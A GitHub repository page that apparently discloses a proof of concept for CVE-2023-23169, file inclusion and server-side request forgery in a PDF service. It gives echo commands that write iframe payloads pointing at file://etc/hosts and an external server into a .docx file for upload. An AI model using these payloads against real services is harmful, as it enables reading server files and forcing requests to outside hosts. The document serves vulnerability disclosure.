Skip to content

S4nshine/CVE-2023-23169

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
May 1, 2023 16:21

CVE-2023-23169

POC for CVE-2023-23169 Local File inclusion & Server side request Forgery

Steps to reproduce :

Local File Incusion :

  1. echo "<iframe src=file://etc/hosts></iframe>" > poc.docx
  2. Upload the file in PDFocus services
  3. View/Download file after to triggered POC

SSRF :

  1. echo "<iframe src=http://your-server></iframe>" > poc.docx
  2. Upload the file in PDFocus services
  3. View/Download file to see triggered POC

Demo :

Screenshot 2023-05-01 at 4 20 28 PM

demo2 demo4

demo3

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published